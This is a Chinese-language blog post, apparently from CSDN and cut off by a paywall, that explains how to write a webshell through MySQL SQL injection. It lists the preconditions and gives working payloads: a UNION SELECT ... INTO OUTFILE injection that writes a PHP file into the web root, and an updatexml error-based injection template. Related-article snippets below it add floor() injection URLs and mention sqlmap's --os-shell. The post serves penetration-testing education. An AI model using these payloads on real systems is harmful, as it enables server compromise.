报错注入写shell

于 2023-04-16 19:22:29 发布
阅读量269 收藏
点赞数
分类专栏: Web漏洞 文章标签: php 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangdongchengya/article/details/130186586
版权
本文详细介绍了在PHP环境下,通过数据库(如MySQL)的报错注入来写入shell的条件和方法,包括secure_file_priv的检查、联合注入的使用限制,以及报错注入的语法错误示例。通过lines starting by、fields terminated by和COLUMNS terminated by等语句进行webshell写入的实践,探讨了可能导致写入失败的原因。
摘要由CSDN通过智能技术生成

文章目录

写shell条件

1、secure_file_priv为空

查询语法:SHOW VARIABLES LIKE “secure_file_priv”;

2、知道绝对目录

3、目录有写入权限

最常见的注入写shell方式

union select 后跟 into outfile 语句,这种方式仅支持存在联合注入的前提下面

注入语法:

?id=1 UNION SELECT '<?php phpinfo();?>',2,3 into OUTFILE 'F:/phpstudy_pro/WWW/test.php'

sql语法:

SELECT * from admin WHERE id = 1 UNION SELECT '<?php phpinfo();?>',2,3 into OUTFILE 'F:/phpstudy_pro/WWW/test.php'

在这里插入图片描述

报错注入写shell

报错的基本语法:updatexml(1,concat(0x7e,(select version()),0x7e),1)

这样可以查询到数据库版本

了解本专栏 订阅专栏 解锁全文 超级会员免费看
G3et
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
SQL二阶注入shell问题——Joomla3.8.2漏洞为例
publicStr的博客
05-10 1255
开始前的例行叨叨:参考大佬文章 http://www.sohu.com/a/223945381_354899发现仅到报错注入一步就没了下文,记录一下最终马的姿势。复现过程:Joomla官网特别良心,各种历史版本随便下载由于复现CVE-2018-6376漏洞,所以下载了3.8.2版本,一路安装好。由于注入点在用户后台,改资料时,复现必须允许用户注册,而且能进自己后台。所以网站建好先用admin账户...
mysql 注入shell_mysql 堆注入shell
weixin_31001855的博客
01-19 276
如果一个平台有注入点的时候可以通过一句话拿shell条件1.myql 5.6.34 版本区分2.有的权限3.知道绝对路径MySQL 中 在在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL ,而 secure_file_priv为null 那么我们就不能导出文件,以下都建立在secure_file_priv 的默认值被修改为无才能利用,且这个只能手工修改配置...
mysql 堆注入shell
weixin_30673715的博客
06-13 418
如果一个平台有注入点的时候可以通过一句话拿shell 条件 1.myql 5.6.34 版本区分 2.有的权限 3.知道绝对路径 MySQL 中 在在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL ,而 secure_file_priv为null 那么我们就不能导出文件,以下都建立在 secure_file_priv 的默认...
mysql 注入shell_MYSQL存在注入点,WebShell的5种方式 · Manning23
weixin_31953847的博客
01-27 291
很久没更新了,分享一个2017年的笔记。0x00 数据前提1,在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp" 被注释 或者 `secure_file_priv 配置的位置是web目录。2,未开启全局gpc。0x01 环境准备测试语句http://172.16.55.130/work/sqli-1.php?id=1页面显示效果​0x02 ...
20、注入篇—————MYSQL数据库Floor报错注入
Fly_鹏程万里
03-02 2326
通过Floor爆错数据库版本http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)...
手工注入常用SQL语句笔记.docx
04-10
* 报错型注入 * UNION 联合查询型注入 * 时间延迟型盲注 * 堆查询注入 三、判断数据库类型 * Access:and (select id from MSysAccessObjects) >0 返回正常说明是 Access * MSSQL:and (select id from ...
第01篇:MySQL注入点WebShell的5种方式1
08-03
在盲注或报错注入的情况下,`UNION SELECT`不可用,可以利用MySQL的语句分隔符来入WebShell。例如,通过SQLMap的`--os-shell`命令,可以实现这一目标。同样,也需要`secure_file_priv`支持,以及数据库用户的`FILE...
crontab与shell脚本
12-15
- 在编Shell脚本时,需要注意防止命令注入攻击,尤其是在处理外部输入的情况下。 - 对于敏感操作,如删除文件,应确保只针对指定的目标执行,避免误操作造成损失。 通过上述内容,我们可以了解到`crontab`和...
sql注入的思维导图。
04-19
* 高权限:可以读文件、执行命令、注册表读取、获取shell等。 * 低权限:可以获取数据库记录信息、查询表、列、值等。 回显与盲注 SQL注入可以通过回显和盲注来获取数据库信息: * 回显:通过查询结果来获取...
CTF常见题型及解题思路.docx
最新发布
10-22
- **SQL注入**:理解基本的SQL语法,识别注入点,绕过WAF(Web Application Firewall),使用盲注技巧如时间注入、报错注入和布尔盲注来获取数据。 - **报错注入**:当系统允许错误信息显示时,可以通过报错信息...
sqlserver命令注入和getshell
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-12 989
SqlServer基本注入需要知道的知识: 1、MSSql的系统自带数据库:master 2、在网站中,同一个网站一般不会跨库。 3、MSSql中每一个库都有一个系统自带表:sysobjects(这是系统对象表,保存当前数据库的对象) 4、注意sysobjects中的三个字段:NAME、XTYPE、ID NAME字段是表名信息;
MySQL注入点入WebShell的几种方式
qq_45521281的博客
05-27 1592
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。 比如:当面对一个MySQL注入点,通过使用SQLmap的--os-shell命令选项,便可轻松一键获取Webshell,但是非正常退出时,便会在网站目录中存留SQLmap临时上传的Webshell文件。 接下来,本文将通过构造一个注入点,分享几种Webshell入的技巧。 0x01 构造一个注入点 1、在默认数据库test中创建测试表admin和测
SQL手工注入、mysqlshell复习
叶子的Blog
01-06 1193
Mysql 手工注入 1.1 联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0' union select 1,2,3,group_concat(column_name) fro
MySql注入到GetShell
Williamanddog的博客
01-17 570
mysql数据库中存在mysql select into outfile命令,该命令的作用是将被选择的一行入一个文件。(2)要有mysql file权限(即能否对系统的文件读取和操作),默认情况下只有root权限有。在配置文件中,我们可以看到数据库的用户名为root,密码为p@ssw0rd。(3)对目录要有权限,一般image之类的存放图片的目录有权限。还要注意:的文件名一定是在网站中不存在的,不然会失败。然后我们通过蚁剑的数据连接就可以进入数据库。然后我们进入config目录查看配置文件。
【SQL注入】从注入到获取服务器shell,记一次完整的SQL注入攻击过程
kkza的博客
10-28 2129
注入 以pikachu为例,首先发现一个数据查询的点,对其进行手工验证 易知存在SQL注入 shell 通过mysql入文件需满足 连接数据库是root用户 my.ini配置文件需明确secure_file_priv="目录",参考:MySQL文件 ...
sql注入shell
weixin_51646864的博客
04-23 6759
靶场练习一下sql注入shell方式
知识总结 | 注入webshell
IerkeU的博客
03-25 3523
一、什么是webshell? ​ webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以称为一种网页后门。 ​ 黑客在入侵在一个网站后,通常会将asp或者php后门文件与网站服务器web目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php的后门,得到一个命令执行环境,以达到控制网站服务器的目的。 一句话木马 ​ 在很多渗透测试过程中,渗透测试人员会上传一句话木马到目标服务器目录继而提权获取系统权限,不论asp、php、jsp都是如此 简
mysqlshell
weixin_47385895的博客
08-22 1887
mysql常见shell方法
sql注入拿shell条件与方法(统计)
Vdieoo的博客
10-30 7773
条件: 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有权限,一般image之类的存放突破的目录就有 在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。 要了解secure_file_priv是否支...
sql注入shell
08-07
很抱歉,我作为AI语言模型不能提供有关SQL注入shell的信息。SQL注入是一种安全漏洞,可以通过在应用程序中注入恶意代码来获取未经授权的访问权限。而shell是指编脚本来执行一系列命令,这与SQL注入无关。请...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值